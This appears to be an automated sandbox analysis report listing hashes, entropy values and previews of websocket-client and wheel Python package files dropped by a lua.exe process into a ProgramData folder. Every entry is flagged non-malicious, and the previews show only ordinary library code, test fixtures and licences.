SSDEEP:	24:BZtSHO7yNF5byfOkHeUHTbVoGz+t0qzKJHLXHDJu8u8pZAGNMKApJDY0GUDdo5aB:xuOuN/byJHOGLqzKJzE8ugNMKyAUBTB
MD5:	4F4AB8C668FF7A9F7DE11804442982F0
SHA1:	CE03C111850D7B117D54401512C3EDBB78EE2797
SHA-256:	51040D4D17953EF8DA2A68753BABB8CA2C248ECC4E52A6ACAE85307694C30820
SHA-512:	5D8D149699B56AB995B91462713C680B19C166121D10485279E456CF99609675E87405D023D74F82EC9C5C154E39C932A256AC80C8FD1B222820CEF8358627DE
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA.."""...""".define websocket exceptions."""...class WebSocketException(Exception):. """. websocket exception class.. """. pass...class WebSocke

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_handshake.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6507
Entropy (8bit):	4.893754130819478
Encrypted:	false
SSDEEP:	96:x9uN/6dSA2hBIVq2aaLg+M9oALoBoIQF4AA1mc3w+PFKXlzR5JCFzNZrmPRnUpc7:vuQIAb8vaLgcAWjFKXlJ4mPRq/6TQi
MD5:	53D119307A4E53B08921FEDBCD10B295
SHA1:	756C61F415BB2CC3DD2548B3DD6F117599A5165C
SHA-256:	6BFB93BFA058E08891587D0AD98C756D42C1FF8CB4DC4A22858A80451BD659D4
SHA-512:	9BC9CB5612527F897A8638F198AF38A9138105C69965FCF4685A8616AD732D4E788530F4E5E2B6E8B5C3FC5446461097683A3546C9B388FF6BC6C35B9490FAA8
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".import hashlib.import hmac.import os..import six..from ._cookiejar import SimpleCookieJar.from ._exceptions import .from ._http import .from ._logg

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_http.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10959
Entropy (8bit):	4.655134454576584
Encrypted:	false
SSDEEP:	192:vuQXeAQ6wgGUyyJjJxBJgjzzFyCzjK60D+neU3VwcsRQfld7C6YWoBzpQSD+1Dt1:vuQXvd5DxBJgjzZyCRFIKqcCd4Bcy
MD5:	B9C9295B6D5A8418D19D7BAC90976A9F
SHA1:	D962FCDDCD6CFB16EB7A4FC4ED401599DBD39307
SHA-256:	9881409101A83EC09043FCCA79AE11E838CC914578E926C343DE8F29A37AB553
SHA-512:	576E3392F90251C5276C13A4C4F73D7F9FF842C066B986CFF45A7EB9CC02D543F9C8C4B08DDAA1B5B6D403EE413F8112130E38D00267223F5C867A47567C8B2A
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".import errno.import os.import socket.import sys..import six..from ._exceptions import .from ._logging import .from ._socket import*.from ._ssl_comp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_logging.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2165
Entropy (8bit):	4.871957369657842
Encrypted:	false
SSDEEP:	48:xuOuN/byJHOGLqwro34tNlevkRfGV7gy5CVYRYNtRrXSeRrX3sRem:x9uN/6DlevkwV7SptRTSeRT3sRB
MD5:	11FFEC48F71ADCC0719E272B3895088E
SHA1:	F27AC81C997062B1BF0871A3266214C5A3A41493
SHA-256:	E9F1D7703B78D0B28F41725F8C90BEA66177DC9CFDC8D48CFA7D866E1BB7D459
SHA-512:	B373EDD2D6E3F0FCD28FFCB8EB5A4EB8D7C5BDDE46155D0B615B21CF1F66B4E8A996840FE668945B71E92E0E9C220FF68B2D4F5DE8E1E4ED4728874BBB8E7988
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".import logging.._logger = logging.getLogger('websocket').try:. from logging import NullHandler.except ImportError:. class NullHandler(logging.H

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_socket.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4793
Entropy (8bit):	4.695290628806179
Encrypted:	false
SSDEEP:	96:x9uN/6CGfCLnI+mM2dvx+QuRo0qapx2Bs7fybT5:vuQCG3CwQFRrcDN
MD5:	2898C2E11BAE4F57D1FB5AC0EBB078E2
SHA1:	C2C3A518A58ABBC9D01B92A0BBE1DA630369C2FD
SHA-256:	EA55F536043BF309F5DD87B7A4E178B7167DAADBC087816C34C25DA33D8E0742
SHA-512:	489F90A7600A03513748F10747305BDA347D172BFA1C9492E03DDAA20E992B72F2CD3677B176A30F94F26D1F3F9A849CDF4BA624E58110763355EA1FFBA95DFE
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".import errno.import select.import socket..import six.import sys..from ._exceptions import .from ._ssl_compat import .from ._utils import *..DEFAULT_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_ssl_compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1797
Entropy (8bit):	4.907613993716943
Encrypted:	false
SSDEEP:	48:xuOuN/byJHOGXqqEXXnkcdzZQ+/s9QLq3p:x9uN/65EnnT+1p
MD5:	86F5B1EE101FD30DBF14161BA61D6A08
SHA1:	F425C2D5BAA5BB90D2C46B6388D989C58CE42CF6
SHA-256:	FF1BD06F7DA844082A8A942DBC8219469434F358991D6F5D49A7BF7F6AB3F71C
SHA-512:	AC7514B9C4B7B34725DCF0E68FA28C44E2CE42E1A82762BA11C68AC1B5578E01893E3FA44C0A996645A5480BA526F032DB474C71F8ED9D5FA4E0F17D6CA9725F
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".__all__ = ["HAVE_SSL", "ssl", "SSLError", "SSLWantReadError", "SSLWantWriteError"]..try:. import ssl. from ssl import SSLError. from ssl impo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_url.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4725
Entropy (8bit):	4.546158742873555
Encrypted:	false
SSDEEP:	96:x9uN/6xb8xBQRoTRE3dr6m1fCnpQaywg2Qp9Ec:vuQCxBQRGREtr6m16pQwu/Ec
MD5:	97A4CC12A6415631D01F5D12B8B41440
SHA1:	FF7159A4F69C6A5EDB3BC8C52342B18C8BD17E45
SHA-256:	B1893275F0F2028F88C998312760815FF2C7D3FA6FC430AFBC367FE85FE8938D
SHA-512:	E61C49205D54E2B90511C29810A18E34465F5BBF859F2BD57A1D7B4FB98D15673F9021C26065B9AA3DCD48EFE13A1B942771C31400127F9129E2102923753CB7
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA.."""..import os.import socket.import struct..from six.moves.urllib.parse import urlparse...__all__ = ["parse_url", "get_proxy_info"]...def parse_url(url):

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\_utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3824
Entropy (8bit):	4.833652515749117
Encrypted:	false
SSDEEP:	48:xuOuN/byJHOGXqM8IkcvvCzlLkzcP3/6Crgdumjl681mXxm+5c7d61IHc9Re25:x9uN/6GlL/v/67dumjl6R8+5TIiReg
MD5:	85A44F7CD415954604BDDFDEA65788E0
SHA1:	0808B354FC14A3775E8C6D7252A0AC2A3C7B299A
SHA-256:	ECA2A254F4C481755986EFE792BCC4C352A5EE6454CF24BD0B2B66D0C9D846D6
SHA-512:	AA4E2B97B87360EEDA5CDA40985B4A6E4AD9B7B7378CB378DA5E4DF9FD949909CDE07731A3E643C24809F7DF4A8114255C316D359EB8A24C034B75E7AD8311D7
Malicious:	false
Preview:	""".websocket - WebSocket client library for Python..Copyright (C) 2010 Hiroki Ohtani(liris).. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 51 Franklin Street, Fifth Floor,. Boston, MA 02110-1335 USA..""".import six..__all__ = ["NoLock", "validate_utf8", "extract_err_message", "extract_error_code"]...class NoLock(object):.. def __enter__(self):.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\cacert.pem Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	304893
Entropy (8bit):	6.054561786435774
Encrypted:	false
SSDEEP:	6144:tcv40fa9pdgENsKXZQw7U58fD2s42lMRTSp5plUHRs2Rr:tcvvS9XOs+vhRg5LrQ
MD5:	6E6743956EE0F3FA5094489673BEDC54
SHA1:	21B9ECDC477831F5BD62DAFE067E797BEA8A3B68
SHA-256:	113BE89390A3358988484F3E9FA903751ABC168F3F4BA9E2EE899FC1B15B8216
SHA-512:	EE9BADA99790CB371BC282CD72E6B8D20E61A5B6CD492538E66291BA43572F3DF88852B9A1710B1248DC48165F798DF434B3FD7050156961B772037D141AA70E
Malicious:	false
Preview:	# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...# Issuer: CN=GTE CyberTrust Global Root O=GTE Corporation OU=GTE CyberTrust Solutions, Inc..# Subject: CN=GTE CyberTrust Global Root O=GTE Corporation OU=GTE CyberTrust Solutions, Inc..# Label: "GTE CyberTrust Global Root".# Serial: 421.# MD5 Fingerprint: ca:3d:d3:68:f1:03:5c:d0:32:fa:b8:2b:59:e8:5a:db.# SHA1 Fingerprint: 97:81:79:50:d8:1c:96:70:cc:34:d8:09:cf:79:44:31:36:7e:f4:74.# SHA256 Fingerprint: a5:31:25:18:8d:21:10:aa:96:4b:02:c7:b7:c6:da:32:03:17:08:94:e5:fb:71:ff:fb:66:67:d5:e6:81:0a:36.-----BEGIN CERTIFICATE-----.MIICWjCCAcMCAgGlMA0GCSqGSIb3DQEBBAUAMHUxCzAJBgNVBAYTAlVTMRgwFgYD.VQQKEw9HVEUgQ29ycG9yYXRpb24xJzAlBgNVBAsTHkdURSBDeWJlclRydXN0IFNv.bHV0aW9ucywgSW5jLjEjMCEGA1UEAxMaR1RFIEN5YmVyVHJ1c3QgR2xvYmFsIFJv.b3QwHhcNOTgwODEzMDAyOTAwWhcNMTgwODEzMjM1OTAwWjB1MQswCQYDVQQGEwJV.UzEYMBYGA1

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\tests\data\header01.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	163
Entropy (8bit):	5.189711116227937
Encrypted:	false
SSDEEP:	3:wL0OAUcNvR/Wd2ooAlH0ORTUOcAV5FuJQJMDyZylqrIARePwvn:wL0D3vk2ooAqjiVbQmCyMAr9YPwv
MD5:	CC4FB9E8F3C530FD9B42055A54C5B7A3
SHA1:	9B11A084470984BBA408D0798DDA44E15B4310DF
SHA-256:	791F540E99DFEE6444CACF4CB6D2B2B7307939703923038658964A99A178208F
SHA-512:	35575FB33F32AD50A7C440CC47D77E0A11174AF3310D23AC18F1BE346D28510E7E9E56FE072B9967D183AE84B490A9A7956ECA0FF4282820AC94C7974E163F57
Malicious:	false
Preview:	HTTP/1.1 101 WebSocket Protocol Handshake..Connection: Upgrade ..Upgrade: WebSocket..Sec-WebSocket-Accept: Kxep+hNu9n51529fGidYu7a3wO0=..some_header: something....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\tests\data\header02.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	161
Entropy (8bit):	5.193368184427071
Encrypted:	false
SSDEEP:	3:wL0OAUcNvR/Wd2jpASORTUOcAV5FuJQJMDyZylqrIARePwvn:wL0D3vk2jpASjiVbQmCyMAr9YPwv
MD5:	75CF7095157E8EBB6B0B91EE2B28B984
SHA1:	0A51D6F37987F80E4464F61D295E602D7533C4AA
SHA-256:	D47CD0188306D0E1B07E76E846452AC1B4C48369D37AF397D966A3D2040045AC
SHA-512:	C49E7F98803697B2C15154EF9CD92B3C2D7B159FAA5371B2DCB20B90B3114A15588B538A6CE76922B74E264947601D08C9D054B86EA574B7A8AE3D6837C4A378
Malicious:	false
Preview:	HTTP/1.1 101 WebSocket Protocol Handshake..Connection: Upgrade..Upgrade WebSocket..Sec-WebSocket-Accept: Kxep+hNu9n51529fGidYu7a3wO0=..some_header: something....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\tests\test_cookiejar.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3688
Entropy (8bit):	4.554515819306088
Encrypted:	false
SSDEEP:	48:zy7NlAuRirlAIRirlA2lAelAS/lAenYlAeTYlAemB+lAJRirlAZlAxlAb/lATIKC:4KgRJQrBoibsXBkOEH0OEHe
MD5:	582BC7C78D9C04599E41D5BCB9125EAC
SHA1:	C1402F768FBF3AA1B4221E4C614AEF2DE5EE50FB
SHA-256:	9C87B7C2EAE59248BDE21FF0E287D9542028440713C3C4F0D3C050CD26D115AB
SHA-512:	DBB453147C29CCE7C9938328CD232C04803D3087D78D7CD790834BD9B907D2FA7A266C5529016BC5EAAA8E928363831F57A2145419ADF9522263183543C8F090
Malicious:	false
Preview:	import unittest..from websocket._cookiejar import SimpleCookieJar..try:. import Cookie.except:. import http.cookies as Cookie...class CookieJarTest(unittest.TestCase):. def testAdd(self):. cookie_jar = SimpleCookieJar(). cookie_jar.add(""). self.assertFalse(cookie_jar.jar, "Cookie with no domain should not be added to the jar").. cookie_jar = SimpleCookieJar(). cookie_jar.add("a=b"). self.assertFalse(cookie_jar.jar, "Cookie with no domain should not be added to the jar").. cookie_jar = SimpleCookieJar(). cookie_jar.add("a=b; domain=.abc"). self.assertTrue(".abc" in cookie_jar.jar).. cookie_jar = SimpleCookieJar(). cookie_jar.add("a=b; domain=abc"). self.assertTrue(".abc" in cookie_jar.jar). self.assertTrue("abc" not in cookie_jar.jar).. cookie_jar = SimpleCookieJar(). cookie_jar.add("a=b; c=d; domain=abc"). self.assertEquals(cookie_jar.get("abc"), "a=b; c=d")..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket\tests\test_websocket.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26649
Entropy (8bit):	5.0254494730690595
Encrypted:	false
SSDEEP:	768:s/DssK8AyLNRKUVMNQHJrAGW8rCifdF0pa0pBkcYNttQUbxd6vid/9pvTAwqmqCG:s/F3LNUUVs6WGWI1iKNttQUbxd6vid/i
MD5:	56E6D642B56E5096752BF1D24F341337
SHA1:	55BDEAF04E1AB89AEE7DBF889C9A6241149EC238
SHA-256:	A5028642A19292C30B72132D17E4CAB05FFD23320BCD6D133AA7E6278E1FD017
SHA-512:	085696527DAD49F013D9892547392AAB746D1B812732E04B7B4F289EC40CED33D7EBC8D513543830FA49E0B887080FC21B955998072912130D8EB7511F5D122D
Malicious:	false
Preview:	# -- coding: utf-8 --.#..import sys.sys.path[0:0] = [""]..import os.import os.path.import socket..import six..# websocket-client.import websocket as ws.from websocket._handshake import _create_sec_websocket_key, \. _validate as _validate_header.from websocket._http import read_headers.from websocket._url import get_proxy_info, parse_url.from websocket._utils import validate_utf8..if six.PY3:. from base64 import decodebytes as base64decode.else:. from base64 import decodestring as base64decode..if sys.version_info[0] == 2 and sys.version_info[1] < 7:. import unittest2 as unittest.else:. import unittest..try:. from ssl import SSLError.except ImportError:. # dummy class of SSLError for ssl none-support environment.. class SSLError(Exception):. pass..# Skip test to access the internet..TEST_WITH_INTERNET = os.environ.get('TEST_WITH_INTERNET', '0') == '1'..# Skip Secure WebSocket test..TEST_SECURE_WS = True.TRACEABLE = True...def create_mask_key(_):. retu

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket_client-0.57.0.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket_client-0.57.0.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1458
Entropy (8bit):	5.09172665947666
Encrypted:	false
SSDEEP:	24:LbUnezoLbOOrYFT5JYrYFTzL6pfBTPJ90432smEOkus8WROL32s3yxtTfy13tT+b:LqOOrYJQrYJzYpPz0432sBG32s3Etm10
MD5:	C4C4A98FBC4836B81C8C64D6ECB01FC1
SHA1:	6AB0289D84AC622DD4A6EFCF6B20D54E3E32F412
SHA-256:	A47B06717E8A3CF01D1307141287B1B4FA17FE4BB8785633D2FC6F57CB71D05E
SHA-512:	A9B6A55C2AB8EC056583D9FC15C30FD47AC33CDA89857EFDE731ADC202C8221121EEC826959F1287E3B3CF00572D445912634551B4C6864EEA8465412A27A342
Malicious:	false
Preview:	Copyright 2018 Hiroki Ohtani...Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS B

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket_client-0.57.0.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7485
Entropy (8bit):	4.998695683936481
Encrypted:	false
SSDEEP:	192:xdcPzePcQJGIFeRHZqFZqSmX1VmSSB1vJ+qKYRtNXsQ:ZPxGaIZMZqxXTm7B1J+qKctNXsQ
MD5:	017876EFC984FEA4DD696EB02C4B31B2
SHA1:	3E1D57AC9E2A68C2BE763E0E164C11ABD74EEA82
SHA-256:	D4B0BDF33B101B3A711AFEF6433D4B21AB7399A8CC820E3442DE16CA6C2CCBBA
SHA-512:	682E64124B6989AD9130F0F2E9235564E2BFE6D05749BAF7924A7C1B42684234CDA53858A867645FC7E1B47899C00F6F352369FB2484B77BE90150C4EE60133D
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: websocket-client.Version: 0.57.0.Summary: WebSocket client for Python. hybi13 is supported..Home-page: https://github.com/websocket-client/websocket-client.git.Author: liris.Author-email: liris.pp@gmail.com.License: BSD.Keywords: websockets.Platform: UNKNOWN.Classifier: Development Status :: 4 - Beta.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.6.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: Microsoft :: Windows.Classifier: Topic :: Internet.Classifier

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket_client-0.57.0.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3022
Entropy (8bit):	5.6985763569008805
Encrypted:	false
SSDEEP:	48:syWgKtEukBgjL0f7CoZTKmETN64ft9KMZx4BnnJvxsyIKirOoI3JnuX8RDDdhylk:syWgKtlRf0fWoZTKmEhRft9KMZx4BnJt
MD5:	30407978F1B389571334D533A1DC1198
SHA1:	516A3826453967F1FD640392CBACF9BBE6F38BAD
SHA-256:	32168902FF7CDEB33CF37DDE11EB8255317FAF019FBA297A8FFC9BBF281DEC6A
SHA-512:	A33523147FEF340D00FC292CB8D8B14DD0C59AEABE7EBF28FC7AD68A6BFB029557968CF8DEEF6BA3821D8BD46079EE5E5F65BB4008E57E0C0AE8AB633BC30B42
Malicious:	false
Preview:	../../Scripts/__pycache__/wsdump.cpython-37.pyc,,..../../Scripts/wsdump.py,sha256=S54et6zebnxb2VJcgBadSnvXblK1iBF93ap54hlc5O8,6403..websocket/__init__.py,sha256=7xvjzZ8tWegR4j9yCpv66DmXanmitwfZf9H6LxRc3tc,1022..websocket/__pycache__/__init__.cpython-37.pyc,,..websocket/__pycache__/_abnf.cpython-37.pyc,,..websocket/__pycache__/_app.cpython-37.pyc,,..websocket/__pycache__/_cookiejar.cpython-37.pyc,,..websocket/__pycache__/_core.cpython-37.pyc,,..websocket/__pycache__/_exceptions.cpython-37.pyc,,..websocket/__pycache__/_handshake.cpython-37.pyc,,..websocket/__pycache__/_http.cpython-37.pyc,,..websocket/__pycache__/_logging.cpython-37.pyc,,..websocket/__pycache__/_socket.cpython-37.pyc,,..websocket/__pycache__/_ssl_compat.cpython-37.pyc,,..websocket/__pycache__/_url.cpython-37.pyc,,..websocket/__pycache__/_utils.cpython-37.pyc,,..websocket/_abnf.py,sha256=nShrTRJn5WvLG1KcAdsfU2KIwDjHtzFgpPSY9hFh6MQ,13791..websocket/_app.py,sha256=6wdPcCUbwBwuBmyaAt1vmRv-aMYhKpORMXXJ-aziwoo,13733..websocket

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket_client-0.57.0.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.810105929829005
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVin3hP+tPCCf7irO5S:RtBMwlVi3hWBBwt
MD5:	E810E49A07579615336DFE1362445C07
SHA1:	7C415D7E52F9507D6414824277CFAE91AB5006E7
SHA-256:	F3335865BC10497A01F487D73A33DF78DC2F02C00B0237DF824DBB16ABC259BA
SHA-512:	3422782BB6F30F4CFFC8BA0648F4A18B2A942A602D7F2676C04402B1549B34E50C1F5F5CD12FC495D08A9C0DB82FB78503CA075BC2479F9519960A0F044B1F09
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.33.6).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\websocket_client-0.57.0.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:z0v:wv
MD5:	71C6C146D1CD29F93BB2183D9500B500
SHA1:	E935307EE7A9C0D1297CBC05BF4E8D4EDF96D920
SHA-256:	F26FED4E971497358697CBFEA63E568BB5E100568DD7F6CB2911D0282CB3E7F2
SHA-512:	E43E0B6640119DDD818FC482F4F5C7F8513ED036926C7DA36BECDB4BFBA69C0319DAC8EA64C44C9954D7C6062A4D10C997AB6A003373C3311FE9D0E56554C6CF
Malicious:	false
Preview:	websocket.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\wheel-0.36.2.dist-info\LICENSE.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1125
Entropy (8bit):	5.143411674177603
Encrypted:	false
SSDEEP:	24:UYWBarRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:LtONJbbvE/NQHOs5eNS3n7
MD5:	9D66B41BC2A080E7174ACC5DFFECD752
SHA1:	53AA128E9D6387E9BB9D945FDCBF1AB4D003BAED
SHA-256:	CCA9E20C6AF1FCFBF69408F377769286CBEEBCDED336100C9B4A3F35FBE635E4
SHA-512:	12CBE04D36D2F0A856DA2001DC7D98D9E431DA37CCCF08F8AF20DD537F5AE7A19E1A7015C3A5542C0329EFBEC7E582751E4CEBCCB459C779BE804AA5B34D5E95
Malicious:	false
